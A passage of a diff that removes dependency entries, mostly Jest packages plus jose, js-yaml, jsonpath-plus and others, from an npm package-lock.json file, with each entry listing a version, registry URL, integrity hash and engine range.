"node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-docblock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.7.0.tgz", - "integrity": "sha512-q617Auw3A612guyaFgsbFeYpNP5t2aoUNLwBUbc/0kD1R4t9ixDbyFTHd1nok4epoVFpr7PmeWHrhvuV3XaJ4g==", - "dev": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-each": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.7.0.tgz", - "integrity": "sha512-gns+Er14+ZrEoC5fhOfYCY1LOHHr0TI+rQUHZS8Ttw2l7gl+80eHc/gFf2Ktkw0+SIACDTeWvpFcv3B04VembQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "jest-util": "^29.7.0", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-environment-node": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.7.0.tgz", - "integrity": "sha512-DOSwCRqXirTOyheM+4d5YZOrWcdu0LNZ87ewUoywbcb2XR4wKgqiG8vNeYwhjFMbEkfju7wx2GYH0P2gevGvFw==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-get-type": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.6.3.tgz", - "integrity": "sha512-zrteXnqYxfQh7l5FHyL38jL39di8H8rHoecLH3JNxH3BwOrBsNeabdap5e0I23lD4HHI8W5VFBZqG4Eaq5LNcw==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-haste-map": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.7.0.tgz", - "integrity": "sha512-fP8u2pyfqx0K1rGn1R9pyE0/KTn+G7PxktWidOBTqFPLYX0b9ksaMFkhK5vrS3DVun09pckLdlx90QthlW7AmA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-leak-detector": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.7.0.tgz", - "integrity": "sha512-kYA8IJcSYtST2BY9I+SMC32nDpBT3J2NvWJx8+JCuCdl/CR1I4EKUJROiP8XtCcxqgTTBGJNdbB1A8XRKbTetw==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.7.0.tgz", - "integrity": "sha512-sBkD+Xi9DtcChsI3L3u0+N0opgPYnCRPtGcQYrgXmR+hmt/fYfWAL0xRXYU8eWOdfuLgBe0YCW3AFtnRLagq/g==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-message-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.7.0.tgz", - "integrity": "sha512-GBEV4GRADeP+qtB2+6u61stea8mGcOT4mCtrYISZwfu9/ISHFJ/5zOMXYbpBE9RsS5+Gb63DW4FgmnKJ79Kf6w==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.3", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-mock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.7.0.tgz", - "integrity": "sha512-ITOMZn+UkYS4ZFh83xYAOzWStloNzJFO2s8DWrE4lhtGD+AorgnbkiKERe4wQVBydIGPx059g6riW5Btp6Llnw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "engines": { - "node": ">=6" - }, - "peerDependencies": { - "jest-resolve": "*" - }, - "peerDependenciesMeta": { - "jest-resolve": { - "optional": true - } - } - }, - "node_modules/jest-regex-util": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.6.3.tgz", - "integrity": "sha512-KJJBsRCyyLNWCNBOvZyRDnAIfUiRJ8v+hOBQYGn8gDyF3UegwiP4gwRR3/SDa42g1YbVycTidUF3rKjyLFDWbg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.7.0.tgz", - "integrity": "sha512-IOVhZSrg+UvVAshDSDtHyFCCBUl/Q3AAJv8iZ6ZjnZ74xzvwuzLXid9IIIPgTnY62SJjfuupMKZsZQRsCvxEgA==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve-dependencies": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.7.0.tgz", - "integrity": "sha512-un0zD/6qxJ+S0et7WxeI3H5XSe9lTBBR7bOHCHXkKR6luG5mwDDlIzVQ0V5cZCuoTgEdcdwzTghYkTWfubi+nA==", - "dev": true, - "dependencies": { - "jest-regex-util": "^29.6.3", - "jest-snapshot": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.7.0.tgz", - "integrity": "sha512-fsc4N6cPCAahybGBfTRcq5wFR6fpLznMg47sY5aDpsoejOcVYFb07AHuSnR0liMcPTgBsA3ZJL6kFOjPdoNipQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.7.0", - "@jest/environment": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-leak-detector": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-resolve": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-util": "^29.7.0", - "jest-watcher": "^29.7.0", - "jest-worker": "^29.7.0", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.7.0.tgz", - "integrity": "sha512-gUnLjgwdGqW7B4LvOIkbKs9WGbn+QLqRQQ9juC6HndeDiezIwhDP+mhMwHWCEcfQ5RUXa6OPnFF8BJh5xegwwQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/globals": "^29.7.0", - "@jest/source-map": "^29.6.3", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.7.0.tgz", - "integrity": "sha512-Rm0BMWtxBcioHr1/OX5YCP8Uov4riHvKPknOGs804Zg9JGZgmIBkbtlxJC/7Z4msKYVbIJtfU+tKb8xlYNfdkw==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "natural-compare": "^1.4.0", - "pretty-format": "^29.7.0", - "semver": "^7.5.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.7.0.tgz", - "integrity": "sha512-z6EbKajIpqGKU56y5KBUgy1dt1ihhQJgWzUlZHArA/+X2ad7Cb5iF+AK1EWVL/Bo7Rz9uurpqw6SiBCefUbCGA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.7.0.tgz", - "integrity": "sha512-ZB7wHqaRGVw/9hST/OuFUReG7M8vKeq0/J2egIGLdvjHCmYqGARhzXmtgi+gVeZ5uXFF219aOc3Ls2yLg27tkw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "leven": "^3.1.0", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-watcher": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.7.0.tgz", - "integrity": "sha512-49Fg7WXkU3Vl2h6LbLtMQ/HyB6rXSIX7SqvBLQmssRBGN9I0PNvPmAmCWSOY6SOvrjhI/F7/bGAv9RtnsPA03g==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.7.0", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.7.0.tgz", - "integrity": "sha512-eIz2msL/EzL9UFTFFx7jBTkeZfku0yUAyZZZmJ93H2TYEiroIx2PQjEXcwYtYl8zXCxb+PAmA2hLIt/6ZEkPHw==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.7.0", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/jose": { - "version": "5.9.6", - "resolved": "https://registry.npmjs.org/jose/-/jose-5.9.6.tgz", - "integrity": "sha512-AMlnetc9+CV9asI19zHmrgS/WYsWUwCn2R7RzlbJWD7F9eWYUTGyBmU9o6PxngtLGOiDGPRu+Uc4fhKzbpteZQ==", - "optional": true, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "node_modules/js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "dependencies": { - "argparse": "^2.0.1" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM=" - }, - "node_modules/jsep": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", - "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==", - "engines": { - "node": ">= 10.16.0" - } - }, - "node_modules/jsesc": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-3.0.2.tgz", - "integrity": "sha512-xKqzzWXDttJuOcawBt4KnKHHIf5oQ/Cxax+0PWFG+DFDgHNAdi+TXECADI+RYiFUMmx8792xsMbbgXj4CwnP4g==", - "dev": true, - "bin": { - "jsesc": "bin/jsesc" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "node_modules/json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, - "node_modules/json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - }, - "node_modules/json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus=" - }, - "node_modules/json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true, - "bin": { - "json5": "lib/cli.js" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/jsonpath-plus": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.3.0.tgz", - "integrity": "sha512-8TNmfeTCk2Le33A3vRRwtuworG/L5RrgMvdjhKZxvyShO+mBu2fP50OWUjRLNtvw344DdDarFh9buFAZs5ujeA==", - "license": "MIT", - "dependencies": { - "@jsep-plugin/assignment": "^1.3.0", - "@jsep-plugin/regex": "^1.0.4", - "jsep": "^1.4.0" - }, - "bin": { - "jsonpath": "bin/jsonpath-cli.js", - "jsonpath-plus": "bin/jsonpath-cli.js" - }, - "engines": { - "node": ">=18.0.0" - } - }, - "node_modules/jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "dependencies": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - }, - "engines": { - "node": ">=0.6.0" - } - }, - "node_modules/kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "node_modules/locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "dependencies": { - "p-locate": "^4.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/lodash.memoize": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", - "integrity": "sha1-vMbEmkKihA7Zl/Mj6tpezRguC/4=", - "dev": true - }, - "node_modules/make-dir": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-4.0.0.tgz", - "integrity": "sha512-hXdUTZYIVOt1Ex//jAQi+wTZZpUpwBj/0QsOzqegb3rGMMeJiSEu5xLHnYfBrRV4RH2+OCSOO95Is/7x1WJ4bw==", - "dev": true, - "dependencies": { - "semver": "^7.5.3" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/make-dir/node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/make-error": { - "version": "1.3.6", - "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", - "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==", - "dev": true - }, - "node_modules/makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "dependencies": { - "tmpl": "1.0.5" - } - }, - "node_modules/merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "node_modules/micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "dependencies": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - }, - "engines": { - "node": ">=8.6" - } - }, - "node_modules/mime-db": { - "version": "1.52.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", - "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mime-types": { - "version": "2.1.35", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", - "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", - "dependencies": { - "mime-db": "1.52.0" - }, - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "dependencies": { - "brace-expansion": "^1.1.7" - }, - "engines": { - "node": "*" - } - }, - "node_modules/minipass": { - "version": "7.1.2", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.2.tgz", - "integrity": "sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==", - "engines": { - "node": ">=16 || 14 >=14.17" - } - }, - "node_modules/minizlib": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.0.1.tgz", - "integrity": "sha512-umcy022ILvb5/3Djuu8LWeqUa8D68JaBzlttKeMWen48SjabqS3iY5w/vzeMzMUNhLDifyhbOwKDSznB1vvrwg==", - "dependencies": { - "minipass": "^7.0.4", - "rimraf": "^5.0.5" - }, - "engines": { - "node": ">= 18" - } - }, - "node_modules/mkdirp": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-3.0.1.tgz", - "integrity": "sha512-+NsyUUAZDmo6YVHzL/stxSu3t9YS1iljliy3BSDrXJ/dkn1KYdmtZODGGjLcc9XLgVVpH4KshHB8XmZgMhaBXg==", - "bin": { - "mkdirp": "dist/cjs/src/bin.js" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "node_modules/natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node_modules/node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node_modules/node-releases": { - "version": "2.0.18", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.18.tgz", - "integrity": "sha512-d9VeXT4SJ7ZeOqGX6R5EM022wpL+eWPooLI+5UpWn2jCT1aosUQEhQP214x33Wkwx3JQMvIm+tIoVOdodFS40g==", - "dev": true - }, - "node_modules/normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "dependencies": { - "path-key": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", - "engines": { - "node": "*" - } - }, - "node_modules/oauth4webapi": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.1.3.tgz", - "integrity": 